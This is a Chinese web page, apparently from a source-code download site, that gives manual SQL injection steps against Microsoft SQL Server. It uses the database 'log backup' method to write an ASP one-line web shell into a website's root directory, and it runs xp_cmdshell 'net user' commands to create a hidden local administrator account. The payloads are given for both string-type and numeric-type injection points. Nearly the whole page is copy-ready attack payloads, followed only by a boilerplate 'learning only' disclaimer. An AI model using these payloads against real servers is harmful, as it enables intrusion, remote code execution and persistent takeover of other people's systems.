sqlserver 手工实现差异备份的步骤

2022-05-24 0 1,089

手工实现差异备份的步骤

字符型:

1、恢复当前库
;alter database 当前库 set RECOVERY FULL–

2、建表cmd
;create table cmd (a image)–

3、备份当前库到D:\cmd1
;backup log 当前库 to disk = ‘D:\cmd1’ with init–

4、插入一句话代码到创建的表cmd
;insert into cmd (a) values (‘<%%25**ecute(request(“a”))%%25>’)– 

5、备份一句话代码到站点根目录
;backup log 当前库 to disk = ‘D:\www_web\oct.asp’–

6、完成
;drop table 创建的表–

数字型

1、恢复当前库
‘;alter database 当前库 set RECOVERY FULL–

2、创建表cmd
‘;create table cmd (a image)–

3、备份当前库到D:\cmd1
‘;backup log 当前库 to disk = ‘D:\cmd1’ with init–

4、插入一句话代码到创建的表cmd
‘;insert into cmd (a) values (‘<%%25**ecute(request(“a”))%%25>’)– 

5、备份一句话代码到站点根目录
‘;backup log 当前库 to disk = ‘D:\www_web\oct.asp’–

6、完成
‘;drop table 创建的表–

sa权限创建管理员用户

1、判断是否有注入;and 1=1 ;and 1=2 
;and user_name()=’dbo’ 判断当前系统的连接用户是不是sa

2、添加系统的管理员
;exec master.dbo.xp_cmdshell ‘net user wk wk90/add’;–
;exec master.dbo.xp_cmdshell ‘net localgroup administrators wk /add’;–

逍遥复仇:有工具我是一定不会手工的,麻烦。

免责声明:
1、本网站所有发布的源码、软件和资料均为收集各大资源网站整理而来;仅限用于学习和研究目的,您必须在下载后的24个小时之内,从您的电脑中彻底删除上述内容。 不得使用于非法商业用途,不得违反国家法律。否则后果自负!

2、本站信息来自网络,版权争议与本站无关。一切关于该资源商业行为与www.niceym.com无关。
如果您喜欢该程序,请支持正版源码、软件,购买注册,得到更好的正版服务。
如有侵犯你版权的,请邮件与我们联系处理(邮箱:skknet@qq.com),本站将立即改正。

NICE源码网 MsSql sqlserver 手工实现差异备份的步骤 https://www.niceym.com/60228.html